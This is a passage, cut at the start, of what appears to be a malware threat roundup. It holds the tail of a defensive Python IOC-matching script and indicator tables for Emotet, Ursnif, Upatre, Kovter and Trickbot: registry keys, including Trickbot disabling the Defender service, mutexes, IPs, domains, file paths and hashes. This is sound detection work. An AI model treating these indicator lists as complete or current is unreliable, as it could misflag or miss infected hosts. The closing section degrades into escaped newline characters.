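    post's own character classes for '<random, matching ...>' parts."""
    for var, path in ENV.items():
        indicator = indicator.replace(var, path)
    indicator = re.sub(r"<(HKLM|HKCU|HKU)>", r"\1", indicator)
    out, pos = [], 0
    for m in PLACEHOLDER.finditer(indicator):
        out += [re.escape(indicator[pos:m.start()]), m.group(1) or ".+"]
        pos = m.end()
    out.append(re.escape(indicator[pos:]))
    return re.compile("".join(out), re.IGNORECASE)


def matcher(category, indicator):
    """Return a predicate over one observed value of the same category."""
    if category == "ip":                        # rows may be CIDR, e.g. x.y.z.26/31
        net = ipaddress.ip_network(indicator.replace("[.]", "."), strict=False)
        return lambda v: ipaddress.ip_address(v) in net
    if category == "domain":
        name = indicator.replace("[.]", ".").lower()
        return lambda v: v.lower().rstrip(".") == name
    rx = to_regex(indicator)
    return lambda v: rx.fullmatch(v) is not None


def corroborated_hits(iocs, observations, min_categories=2):
    """observations: [(category, value)] from EDR, sandbox or proxy logs.  A family
    is reported only with hits in >= min_categories: one IOC alone proves nothing."""
    hits = defaultdict(lambda: defaultdict(set))
    for family, entries in iocs.items():
        for category, indicator, _ in entries:
            hit = matcher(category, indicator)
            for obs_cat, value in observations:
                if obs_cat == category and hit(value):
                    hits[family][category].add(indicator)
    return {f: {c: sorted(s) for c, s in cats.items()}
            for f, cats in hits.items() if len(cats) >= min_categories}


# Constructed observations from one host.
OBSERVED = [
    ("ip", "239.255.255.250"),          # SSDP multicast: every Windows host does this
    ("domain", "whois.iana.org"),
    ("ip", "173.194.207.27"),           # inside the 173.194.207.26/31 row
    ("registry", r"HKLM\SYSTEM\CONTROLSET001\SERVICES\Q7K2M9ZX::Type"),
    ("file", r"C:\Users\alice\AppData\Local\Temp\qwzrtyuk.exe"),
    ("mutex", r"Global\316D1C7871E10"),  # a lone Trickbot IOC: not reported
]
REPORT = corroborated_hits(parse_roundup(SAMPLE_ROUNDUP), OBSERVED)  # Tofsee only
```

`REPORT` names Tofsee with hits in four categories (registry, ip, domain, file) and leaves Trickbot out, because its only hit is the mutex. For real use, feed `parse_roundup` the tables from the post (or the JSON export linked above) and `corroborated_hits` your process, registry, DNS and proxy telemetry; the `min_categories` threshold is where you tune how much corroboration you demand before a host is escalated.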

* * *

## Threat Breakdown

### Win.Dropper.Emotet-7355854-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS Value Name: Type` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS Value Name: Start` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS Value Name: ErrorControl` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS Value Name: ImagePath` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS Value Name: DisplayName` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS Value Name: WOW64` | 10
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\SPOOLERIPSPS Value Name: ObjectName` | 10
`<HKLM>\SOFTWARE\CLASSES\MFCCALC.CALCULATOR` | 10
`<HKLM>\SOFTWARE\CLASSES\MFCCALC.CALCULATOR\CLSID` | 10
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\PROGID` | 10
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\INPROCHANDLER32` | 10
`<HKLM>\SOFTWARE\CLASSES\MFCCALC.CALCULATOR` | 10
`<HKLM>\SOFTWARE\CLASSES\MFCCALC.CALCULATOR\CLSID` | 10
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\LOCALSERVER32` | 10
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}` | 9
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}` | 9
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\PROGID` | 9
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\INPROCHANDLER32` | 9
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\{62C4DD10-F45E-11CD-8C3D-00AA004BB3B7}\LOCALSERVER32` | 9
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\\PROGID` | 1
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\\INPROCHANDLER32` | 1
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\\INPROCHANDLER32` | 1
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID` | 1
`<HKLM>\SOFTWARE\CLASSES\WOW6432NODE\CLSID\\LOCALSERVER32` | 1

Mutexes | Occurrences
---|---
`Global\I98B68E3C` | 10
`Global\M98B68E3C` | 10
`Global\M3C28B0E4` | 8
`Global\I3C28B0E4` | 8

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`45[.]33[.]54[.]74` | 10
`54[.]38[.]94[.]197` | 9
`173[.]194[.]68[.]108/31` | 8
`74[.]208[.]5[.]15` | 7
`193[.]70[.]18[.]144` | 7
`172[.]217[.]10[.]83` | 7
`74[.]208[.]5[.]2` | 6
`74[.]6[.]141[.]50/31` | 6
`205[.]178[.]146[.]249` | 5
`173[.]203[.]187[.]10` | 5
`173[.]203[.]187[.]14` | 5
`205[.]204[.]101[.]152` | 5
`74[.]6[.]141[.]44/31` | 5
`17[.]36[.]205[.]74/31` | 5
`178[.]128[.]148[.]110` | 5
`209[.]141[.]41[.]136` | 5
`217[.]69[.]139[.]160` | 4
`205[.]178[.]146[.]235` | 4
`69[.]147[.]92[.]12` | 4
`65[.]55[.]72[.]183` | 4
`159[.]127[.]187[.]12` | 4
`94[.]100[.]180[.]70` | 4
`94[.]100[.]180[.]160` | 4
`23[.]227[.]38[.]64` | 4
`172[.]217[.]3[.]115` | 4

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`secure[.]emailsrvr[.]com` | 8
`smtp-mail[.]outlook[.]com` | 8
`smtpout[.]secureserver[.]net` | 8
`smtp[.]mail[.]com` | 7
`smtp[.]mail[.]ru` | 7
`smtp[.]aol[.]com` | 6
`smtp[.]comcast[.]net` | 6
`smtp[.]1and1[.]com` | 5
`smtp[.]prodigy[.]net[.]mx` | 5
`ssl0[.]ovh[.]net` | 5
`mail[.]paypal[.]com` | 4
`mail[.]mail[.]ru` | 4
`smtp[.]dsl[.]telkomsa[.]net` | 4
`mail[.]widatra[.]com` | 3
`smtp[.]dropbox[.]com` | 3
`outbound[.]att[.]net` | 3
`smtp[.]emailsrvr[.]com` | 3
`smtp[.]verizon[.]net` | 3
`smtp[.]idmsa[.]apple[.]com` | 3
`smtp[.]cox[.]net` | 3
`mail[.]enterprisesolutioninc[.]com` | 3
`smtp[.]mxhichina[.]com` | 3
`mail[.]americashomeplace[.]com` | 3
`smtp[.]fatcow[.]com` | 3
`relais[.]videotron[.]ca` | 3

*See JSON for more IOCs

Files and or directories created | Occurrences
---|---
`%SystemRoot%\SysWOW64\spooleripspsa.exe` | 1
`\TEMP\aatgsjewU4YpaJ.exe` | 1
`\TEMP\4uwvBUGZ.exe` | 1
`\TEMP\sqjjfdnz8obMXZL.exe` | 1
`\TEMP\D9VaRGmZ.exe` | 1
`%SystemRoot%\TEMP\D3F5.tmp` | 1
`\TEMP\PdapKX6bjx.exe` | 1

#### File Hashes

`0bf9f6907fd3f6a3f5734b23120671230c480b03c96a1779348f9cdc49bb58f8 11f97585ad2aeb41f4c972b2e29523d4ca70cc4a065547d9abca659d2c3193d1 418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f 9d8895333339dde00e8778e9181cfbf0df29e35c0dda842aa30ff7a44b96cd11 a3a3de174e94beb142799b6f03c84bfe4c563e287a6a5288bbd64ccc9910ce24 aea84511050a07ff22e621888f19921585485fd171228cc6ad723f4c1b90225f b988217de26056f0db1ba17940d5fc0e138c59fc46652d7b5046281f8152aa0b ca3889a38bf35766b0ad59605bd6d3f6c333309f690708a3b51f7e80cc32be85 d4363da6ccb0a0ef3c69010d7351a2d9459e4c5fef26fe00c240eb901125cd78 ddb191fb3328dd25f79f79133e821cdb36590a80cabb1e6a1206fd11a19445ec`

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security |
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa |

#### Screenshots of Detection

#### AMP

[Screenshot](<https://1.bp.blogspot.com/-FRlFNOpm0Cg/XbMSvyeCfVI/AAAAAAAAC0s/E_8TKFBeqWEznPa8cjb_NdbIdhC5EcjhQCLcBGAsYHQ/s1600/418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f_amp.png>)

#### ThreatGrid

[Screenshot](<https://1.bp.blogspot.com/-stSf5Ksf8ss/XbMSz5eBiCI/AAAAAAAAC0w/NFK7djTRizIWicly3fDTR1I8g2ZfUWVYgCLcBGAsYHQ/s1600/418ba2dbbda1d95428128998352856705040857f1008fbdf809cdeb7c174211f_tg.png>)

* * *

### Win.Malware.Ursnif-7355802-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: api-PQEC` | 10
`<HKCU>\SOFTWARE\MICROSOFT\IAM Value Name: Server ID` | 10
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 Value Name: Client` | 10
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 Value Name: {F50EA47E-D053-EF14-82F9-0493D63D7877}` | 10
`<HKCU>\SOFTWARE\APPDATALOW\SOFTWARE\MICROSOFT\D31CC7AF-167C-7D04-B8B7-AA016CDB7EC5 Value Name: {6A4DAFE8-C11D-2C5C-9B3E-8520FF528954}` | 10

Mutexes | Occurrences
---|---
`Local\{57025AD2-CABB-A1F8-8C7B-9E6580DFB269}` | 10
`Local\{7FD07DA6-D223-0971-D423-264D4807BAD1}` | 10
`Local\{B1443895-5CF6-0B1E-EE75-506F02798413}` | 10
`{A7AAF118-DA27-71D5-1CCB-AE35102FC239}` | 10
`{<random GUID>}` | 10

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`208[.]67[.]222[.]222` | 10
`172[.]217[.]10[.]110` | 10
`172[.]86[.]121[.]117` | 10

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`resolver1[.]opendns[.]com` | 10
`222[.]222[.]67[.]208[.]in-addr[.]arpa` | 10
`myip[.]opendns[.]com` | 10

Files and or directories created | Occurrences
---|---
`\{4BC230AC-2EB3-B560-90AF-42B9C45396FD}` | 10
`%APPDATA%\Microsoft\Dmlogpui` | 10
`%APPDATA%\Microsoft\Dmlogpui\datat3hc.exe` | 10
`%TEMP%\<random, matching [A-F0-9]{3,4}>` | 10
`%TEMP%\<random, matching [A-F0-9]{3,4}\[A-F0-9]{2,4}>.bat` | 10
`%TEMP%\<random, matching [A-F0-9]{4}>.bi1` | 9
`\TEMP\4F03FE~1.EXE` | 1
`%TEMP%\CE0E\6707.tmp` | 1
`\TEMP\69E08A~1.EXE` | 1
`%TEMP%\47D0\A3E8.tmp` | 1
`\TEMP\85FD74~1.EXE` | 1
`%TEMP%\903.bi1` | 1
`\TEMP\906352~1.EXE` | 1
`\TEMP\A11B56~1.EXE` | 1
`%TEMP%\3634\1B1A.tmp` | 1
`%TEMP%\3E3E\1F1F.tmp` | 1
`\TEMP\BB271B~1.EXE` | 1
`\TEMP\C1C116~1.EXE` | 1
`%TEMP%\8878\443C.tmp` | 1
`\TEMP\CA13C5~1.EXE` | 1
`%TEMP%\C9AC\64D6.tmp` | 1
`\TEMP\D66D2E~1.EXE` | 1
`\TEMP\E4F5F1~1.EXE` | 1

#### File Hashes

`4f03fe32e46386a2379e65b631e786cdeeec223017069d2731a723e4d2c50393 69e08aa34638b3b213dc3c7f7a188e4d56685ca8abd4bfa97f575757a1f4bc12 85fd74ee1f19173597c3995376c31c617c0cd615d1d4e862edbe2459200397ed 90635217dd43e1ccfc8c25aef6619b1a929b5e7d1800b9cebd8686d052243611 a11b566c7bd562cb4cdee2c1bc92313a11ebdacf4fdde58c224eb7eac0e6faf1 bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb c1c1165edb4b0853d6433961aec1b54982fe3273a094d53bb1b2f23e9f6713de ca13c5fb577c3a218a3be31c59145137e11b4c7188839b7962a3ce3e7d6277ec d66d2ea9744ca077c3dc76c303a284c1d2b863151931ddcce656fb35a52289e6 e4f5f19e945a41ad8f0ec7e9c35b23ea039a5a2bdaaf8e42a78c8f86b231334e`

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

[Screenshot](<https://1.bp.blogspot.com/-WE_0-l9xsRY/XbMTGgbn3yI/AAAAAAAAC08/PF7db_lZj3IaYc5hrsljMrxhSQY2JA5JACLcBGAsYHQ/s1600/bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb_amp.png>)

#### ThreatGrid

[Screenshot](<https://1.bp.blogspot.com/-MDzTnqb5kkw/XbMTJwxP1JI/AAAAAAAAC1A/hpqhzB9wiRkO5YlIR5EknRTVx2VEto5EQCLcBGAsYHQ/s1600/bb271b6725170345188008dfb90069c9f741b93cf0a504a9c70f177c2dd670cb_tg.png>)

* * *

### Win.Malware.Upatre-7355650-0

#### Indicators of Compromise

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`83[.]136[.]254[.]57` | 8

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`cardiffpower[.]com` | 8

Files and or directories created | Occurrences
---|---
`%TEMP%\hcbnaf.exe` | 18
`%TEMP%\hgnddkje.exe` | 17

#### File Hashes

`0001e614c453604df0274956181e30350b7d6b1b91a169efdcbfee9a14a17626 01cd20d9212c000b7d8d97c47029b1b487050ead1b65e1c9c34e475f0f178add 055c1293bfc73671ac423aca35488dc3ec7510523695b8bf50d2f52e625680b7 1abc3b0481dc17e7aa7176b87605503b0baa9e340b4c5e673597fd06725f72f8 1f1db1372645d08bf117d2154ef9f67a2163295900b6311e4cd2268669601c1c 27e9f49d26c1202470242da4fe53199b74f525ee13bee5b34b1d613f2d5f2983 4200aca5bfb24f7b02cbcd39c7d6f4c773ed34eec17ac11ad9d5cee5aaba1940 669b62caaa55cf04de326355b319e16f481092c8098b418f9f2b09051b5e9088 8412bf5346bedec07e58c31bd15ddd98d31e8686c9f870444b2bbd1c8b527cb7 9476469b243db70017ef61c6da483e516516380136a4799015a4ef056e9f1742 9fe8e8a4818e3d63741c4c21ebb9e240d1a26573614162c0b313246b387ef13d a9d192a121401a7bb63b4fb403f346153090f239ff0761d2f12d12b7bc49741f bcecb26d7f81aa151a5d2f74f91029a6b1160bc02f431b3c617971ecdeb9e79b e0b5ae5ad859b17ee532cb274f952ee18254fe941b3d8a129fddda85c65225fb f480866abfdfd00f7c4a383f1acc9cdd01915d67fed1db367e8dd1cb41171983 f4968453af8a196794abe13cca1747da16b15850c99428778c9a1f6609ca22db
fbd5dcf3f1a93947cb72d9b9d48189810c630d32e94b6f2bbb1811a349e1fb00 fc51c46b56c0a23b400789cd2408a8e8f0204ebb544a410298578c277227cea9`

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella |
Wsa |

#### Screenshots of Detection

#### AMP

[Screenshot](<https://1.bp.blogspot.com/-5MK_onxmsMg/XbMTvl3A0sI/AAAAAAAAC1Q/gRy_kxL2IkIu_yBoasybIt95BdGrmjmJgCLcBGAsYHQ/s1600/055c1293bfc73671ac423aca35488dc3ec7510523695b8bf50d2f52e625680b7_amp.png>)

#### ThreatGrid

[Screenshot](<https://1.bp.blogspot.com/-NNRa5QrtV38/XbMT0YUs6PI/AAAAAAAAC1U/ViBmNEJ3xSU2PgWdqR3p9W5-LFExBEKIwCLcBGAsYHQ/s1600/4200aca5bfb24f7b02cbcd39c7d6f4c773ed34eec17ac11ad9d5cee5aaba1940_tg.png>)

#### Umbrella

[Screenshot](<https://1.bp.blogspot.com/-Hl00DmZo4z0/XbMT6a04q6I/AAAAAAAAC1Y/npMrmH8bx70pm-DzeEFwmFAnz1u2gFEQgCLcBGAsYHQ/s1600/2eb229efaa5a043263e6546583c811738d5695a8afbb035f3c76fe80929c18eb_umbrella.png>)

* * *

### Win.Dropper.Kovter-7352197-0

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION Value Name: iexplore.exe` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION Value Name: iexplore.exe` | 25
`<HKCU>\SOFTWARE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION Value Name: regsvr32.exe` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\INTERNET EXPLORER\MAIN\FEATURECONTROL\FEATURE_BROWSER_EMULATION Value Name: regsvr32.exe` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\3E7DC3D9A3 Value Name: ab87b5d3` | 25
`<HKCU>\SOFTWARE\3E7DC3D9A3 Value Name: ab87b5d3` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\3E7DC3D9A3 Value Name: 626beb1a` | 25
`<HKCU>\SOFTWARE\3E7DC3D9A3 Value Name: 626beb1a` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\3E7DC3D9A3 Value Name: 52e3fdae` | 25
`<HKCU>\SOFTWARE\3E7DC3D9A3 Value Name: 52e3fdae` | 25
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN` | 25
`<HKCU>\SOFTWARE\3E7DC3D9A3` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\3E7DC3D9A3` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\3E7DC3D9A3 Value Name: 13faecd5` | 25
`<HKCU>\SOFTWARE\3E7DC3D9A3 Value Name: 13faecd5` | 25
`<HKCU>\SOFTWARE\3E7DC3D9A3 Value Name: 214fab25` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\3E7DC3D9A3 Value Name: 214fab25` | 25
`<HKCU>\SOFTWARE\3E7DC3D9A3 Value Name: 89d39e9a` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\3E7DC3D9A3 Value Name: 89d39e9a` | 25
`<HKLM>\SOFTWARE\WOW6432NODE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 3f88794a` | 25
`<HKLM>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\POLICIES\EXPLORER\RUN Value Name: f50e45da` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\RUN Value Name: 3f88794a` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.101 Value Name: CheckSetting` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.103 Value Name: CheckSetting` | 25
`<HKCU>\SOFTWARE\MICROSOFT\WINDOWS\CURRENTVERSION\ACTION CENTER\CHECKS\{E8433B72-5842-4D43-8645-BC2C35960837}.CHECK.100 Value Name: CheckSetting` | 25

Mutexes | Occurrences
---|---
`4C2A424BDFE77F08` | 25
`Global\377DB1FA5041B00C` | 25
`2CAEEF5D79FF2C96` | 25
`5F02253DDD3215C1` | 25
`0F8579C06C8A73E7` | 15
`Global\148FEA91D04ADF73` | 15
`35A61B8070E50AA3` | 15

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`82[.]21[.]65[.]83` | 1
`166[.]141[.]185[.]163` | 1
`93[.]229[.]231[.]137` | 1
`142[.]250[.]246[.]73` | 1
`159[.]182[.]203[.]131` | 1
`63[.]121[.]210[.]194` | 1
`42[.]97[.]167[.]153` | 1
`113[.]179[.]182[.]225` | 1
`156[.]34[.]80[.]75` | 1
`218[.]64[.]159[.]231` | 1
`182[.]94[.]255[.]58` | 1
`84[.]226[.]162[.]67` | 1
`212[.]123[.]72[.]164` | 1
`183[.]74[.]168[.]214` | 1
`20[.]118[.]2[.]20` | 1
`168[.]141[.]179[.]181` | 1
`114[.]97[.]61[.]121` | 1
`201[.]32[.]115[.]236` | 1
`108[.]124[.]8[.]164` | 1
`212[.]246[.]227[.]79` | 1
`68[.]6[.]254[.]161` | 1
`159[.]133[.]144[.]196` | 1
`16[.]215[.]96[.]194` | 1
`189[.]183[.]233[.]195` | 1
`60[.]194[.]81[.]71` | 1

*See JSON for more IOCs

Domain Names contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`www[.]cloudflare[.]com` | 2
`cpanel[.]com` | 1
`httpd[.]apache[.]org` | 1
`cp[.]aliyun[.]com` | 1
`netcn[.]console[.]aliyun[.]com` | 1
`bugs[.]launchpad[.]net` | 1
`manpages[.]debian[.]org` | 1
`files[.]ofile[.]com` | 1
`www[.]zerodistance[.]fi` | 1

#### File Hashes

`015d420249c90969fc15bd3c81839c05242c68e42135bc6e04743f16c3db8247 119e68e1ed3d764e9ccedbffb4e2adc1522b9a9c4672c8a52c70d3b75af919f1 19595e9e80a2da27c682814726e373d7207e6681b9a4b96a5744736976342f46 1fc7d5d27d4817cacae040833970a636a41a6cfe9fa783de92cdad2e93a620ac 21f75f1a46cc68cde8bc7cc10d63bca95a561268ad49d943afc8ca177cc89184 26555d26c4afce1e035031d293aab4acdb12a77530b375421be6e0bb80742057 41ce8bc25ec1a3bf85e346656cdfdcd1eaa4070c3783d133f25ffcebf55bb6d8 423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a 533b055f7be13fe6c40eb49bebf93901b22ea3ada9babf100675c7ca53cd0c03 605ea58c8282dc5ef581f31b24647d463562d646a5be2004a174773416ec106c 6181608294d3482931e3a65f1e7c63182327076506e1c7c51583b57ef115d8ed 69ba2b3868404234ead2f364cbbfd1a13af9da0fbfa77845a09e06525f3c107f
72e70aa9877033cdf9c6d77f767545cd1365f7034a4da22c823eea4d60eb1bee 76d567e13a7cb9d97682944975accbeb0c4f3f6858ab84f64af849c4d5df25bb 8136ceed3bc05c0ebe9b0ac8bb9c9925eb781f6fa4a994c976f3ff24f692e962 91f71c8b5385d7441e2f8b82ce5be7f17a9c9fddd431c45dafab309d2fd76145 9218ea373d7322c49a3248b94b13366499f23d30b1f17ea63c3c19fe788376a6 97603c7315e26964dd15bdfb9a5932340271a949352364ebcb694282dd282ed1 9e7ce5f193afa02fc3165a34366981a34a1685deaf2b249f4fb089c8a25e77fd a318a5c36defbd74a7ad1ef3cca3670dadb918d692ce1e97c62b8022bb5a7ee6 c36a861e05aac4fa885836f60b871cc116085e05351d8a1a586db85dc902786f d0120bc8873d60781fd8a0640ce9d37a2f8daefc90747196ba70f4e7b5af41c1 d1fe8fea741f9758292df1b335ed203c4f9f6ec462690dd7338f043a01ffae8c d89115020458a087bb71f7f338e8b5cc9182c98d6559cf0573c5a87304fdd65b dfe7a1d91600e7bde92d16deb4a3bee5da7c01391d55f3e03c57e817d7bff7c6`

*See JSON for more IOCs

#### Coverage

Product | Protection
---|---
Amp |
Cloudlock | N/A
Cws |
Email Security |
Network Security | N/A
Stealthwatch | N/A
Stealthwatch Cloud | N/A
Threat Grid |
Umbrella | N/A
Wsa | N/A

#### Screenshots of Detection

#### AMP

[Screenshot](<https://1.bp.blogspot.com/-zaAbJCVallA/XbMVTdEoonI/AAAAAAAAC1s/cey-CAka8WobFk98jUOtCE7HFMAoOxDsgCLcBGAsYHQ/s1600/423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a_amp.png>)

#### ThreatGrid

[Screenshot](<https://1.bp.blogspot.com/-qS_zecVWJxI/XbMVYEMg2nI/AAAAAAAAC1w/V5lxMAi6DuQbwgmFw5TNxvUNFBLXvEfKQCLcBGAsYHQ/s1600/423e4d33687cb3e6fe4ebce6d36fa2d0b94006b28ad08de89fa2d2be2db4046a_tg.png>)

* * *

### Win.Malware.Trickbot-7352185-1

#### Indicators of Compromise

Registry Keys | Occurrences
---|---
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: DeleteFlag` | 23
`<HKLM>\SYSTEM\CONTROLSET001\SERVICES\WINDEFEND Value Name: Start` | 23

Mutexes | Occurrences
---|---
`Global\316D1C7871E10` | 23

IP Addresses contacted by malware. Does not indicate maliciousness | Occurrences
---|---
`200[.]122[.]209[.]78` | 8
`176[.]119[.]156[.]225` | 6
`31[.]202[.]132[.]22` | 5
`190[.]0[.]20[.]114` | 3
`152[.]89[.]245[.]209` | 3
`103[.]122[.]33[.]58` | 2
`181[.]143[.]17[.]66` | 2
`45[.]160[.]145[.]216` | 2
`37[.]44[.]212[.]179` | 2
`80[.]173[.]224[.]81` | 1
`119[.]92[.]23[.]203` | 1
`201[.]184[.]69[.]50` | 1
`190[.]109[.]178[.]222` | 1
`68[.]186[.]167[.]196` | 1
`45[.]160[.]145[.]11` | 1
`185[.]255[.]79[.]127` | 1
`45[.]160[.]145[.]179` | 1
`117[.]204[.]255[.]139` | 1
`103[.]87[.]48[.]37` | 1
`195[.]123[.]237[.]155` | 1
`190[.]109[.]169[.]49` | 1

Files and or directories created | Occurrences
---|---
`%APPDATA%\browser\settings.ini` | 23
`%APPDATA%\browser` | 23
`%System32%\Tasks\BrowserStorage` | 23
`%APPDATA%\BROWSER\<original file name>.exe` | 23

#### File Hashes

`0627afe0eb7517208d514c54b83436885eae259fa984bd6dbcfeb788ce5f2b80 0e21da4e3c8dfd077454f417b8b602b281887dbc487cce3e60a508b03ec7a897 2820d3a726768ac98f7357f182fa0f27e63743c025a40025f316a281dbecfe66 4e6f460398ab227ece450409e1343665b73a73f1c330b9ebbb8a03c8c2171f1b 587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e 66b9b21677bfbb131aaab959f603091db4ce740a92c2376d84df43343b2de68d 69b4a369319e0c9c16fee1fe7db6f5ccc20076e4296a000f92f756ef1cb31533 756bf7440aa067883f18db9c567fa11c45aa9a7ee05e86bd2f759a726500d90d 80096a877332490f8e5d303906335e5420e8a95f90109c08596330ab0d77cf8a 843019efa320b08991d64ce99faaa5a254af828f6f8be64715f6e5f3833769be 877f01088ac912f8e7cfffd81b86ba21d8eeaccb5e3f675fd5299efab7e8fc5f 8fc61570c2e05fd746da7e7e14d9558afe38b0f00e6ccf2c43e0fd46247fb8f2 9706de7a46a3a13ba3275aa583ac70b31071a8fb30e3bd1061ceb0c3ea6532fe a5eb7f6a1d253fe60bf02e19a8858fd80dc4a7358f660d84fa85b6f6e011b11e bd26a6bd3d52b26c66f1b3503b0dd901a68318a66caa846d77fde10ad6f9668a c84b91da836a003057d90123e25cbaec576a20d1f98c621d777de47cdfdd40e3
cad65e1ce6ec9e36e8073c79a0a406997ed825e65af3952e55ea9c44c6e39122 ce5393632e1c0adb91af5ffc8a6b486141cb895a3b762b853ebfdb3518563dbf d0e9f2ba27da2bee48617c219a2a5e4b2db9d96b5e19ac16098384c3bb36c65f d54747ba18aec6ee4a9670148fd420dab486992f37df1e577abd9bc4d5dd2eb6 dd5ae9ad15a51845b317b83ba6d0bf2f010b2dfae3c85e7099b95c9bb0ea09a0 f79bac124531d2050d668a510e074930f5c1c9af7997a9513a8f16eb7549a8b7 fc061e1261397c24a7d074a7cac01e74af9f47b6300911f3734104c1557928d8 `\n\n#### Coverage\n\nProduct | Protection \n---|--- \nAmp |  \nCloudlock | N/A \nCws |  \nEmail Security |  \nNetwork Security |  \nStealthwatch | N/A \nStealthwatch Cloud | N/A \nThreat Grid |  \nUmbrella | N/A \nWsa |  \n \n#### Screenshots of Detection\n\n#### AMP\n\n[](<https://1.bp.blogspot.com/-r0rUv1OadjA/XbMWmL1F6ZI/AAAAAAAAC2A/svzZCUcu6QsSkhOt_fd-qJfm5uFDhz8RwCLcBGAsYHQ/s1600/587e038e8e3bf1e2a4005a89dea96f084d2e6a2c89ab0eea9c3a112997e48c1e_amp.png>)\n\n \n\n\n#### 